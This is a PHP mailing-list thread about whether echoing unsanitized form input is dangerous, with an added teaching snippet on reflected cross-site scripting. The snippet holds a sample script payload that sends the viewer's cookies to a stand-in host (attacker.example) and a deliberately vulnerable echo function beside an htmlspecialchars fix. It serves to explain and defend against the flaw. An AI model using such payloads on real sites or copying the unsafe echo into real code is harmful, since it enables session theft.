Re: Echoing input w/o sanitizing - what is the danger

Thanks Stut and Daniel,
I guess my fears were somewhat unfounded. At least in the case where you're the only one who sees the result.

- Dan

"Daniel Brown" <parasane@xxxxxxxxx> wrote in message news:ab5568160708071508i3b186617h7a1c7db1ae7b69e2@xxxxxxxxxxxxxxxxx
On 8/7/07, Dan <frozendice@xxxxxxxxx> wrote:
I've always heard it is bad if you let a user type some input, then show it
back to them w/o sanitizing the code. E.g. I have a form where the user
types something, they hit submit, it submits to itself, and then it prints back
to the user something like "account created with password: whatever they
typed".

Why and how do you sanitize what they typed before echoing it back to them?
I figured it was something like they could type in PHP commands, but I tried
typing phpinfo(); into the box and submitting. All that happened is that
it echoed phpinfo();

Can someone explain this?

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



   It's actually not so much for echoing as it is for processing the
data in another manner that makes it dangerous not to do some
sanitizing and checking... such as database manipulation.

--
Daniel P. Brown
[office] (570-) 587-7080 Ext. 272
[mobile] (570-) 766-8107

Hey, PHP-General list.... to give something back to everyone, you guys
can have 50% off every month on hosting plans of $10/mo. or more (list
price) at http://www.pilotpig.net/.
Use the coupon code phpgeneralaug07

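The following is an added illustration of the form from the original question, not code posted by any participant in the thread. It shows why the echo by itself is a problem once anyone other than the submitter can view the output (reflected cross-site scripting), and why typing phpinfo(); did nothing: echo outputs text, it never evaluates it as PHP. The function names, the sample input and the attacker.example hostname are constructed for the example.

```php
<?php
// Added example (not from the mailing-list thread).
//
// Context: a form posts to itself and prints "Account created with
// password: <whatever the user typed>". The question was whether
// echoing that unsanitized string back is dangerous.

// Constructed sample input, standing in for $_POST['password'].
// Typing phpinfo(); here is harmless: echo prints the literal string,
// it does not run it. Only eval()/include() of user input would.
// Markup, however, IS interpreted, by the browser of whoever views
// the page, so a string like this runs as JavaScript for the viewer.
$submitted = '<script>document.location="http://attacker.example/?c="'
           . '+encodeURIComponent(document.cookie)</script>';

// Vulnerable: the input goes into the HTML response verbatim.
// Anyone who can make a victim load this page with attacker-chosen
// input (e.g. a shared link, a stored value shown to an admin)
// gets script execution in the victim's browser.
function render_unsafe(string $input): string
{
    return "Account created with password: " . $input;
}

// Hardened: encode for the HTML context at the point of output.
// The text still reads exactly as typed, but < > & " ' become
// entities, so the browser renders rather than executes it.
function render_safe(string $input): string
{
    return "Account created with password: "
        . htmlspecialchars($input, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Compare the two responses. The first contains a live <script>
// element; the second contains &lt;script&gt;... as inert text.
echo render_unsafe($submitted), PHP_EOL;
echo render_safe($submitted), PHP_EOL;
```

The encoding is context-specific: htmlspecialchars() protects output placed in an HTML body or a quoted attribute, and nothing else. For the database case raised in the reply, the corresponding protection is a parameterized query (PDO or mysqli prepared statements), since HTML encoding does nothing for SQL, and a value in a JavaScript or URL context needs its own encoding again.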

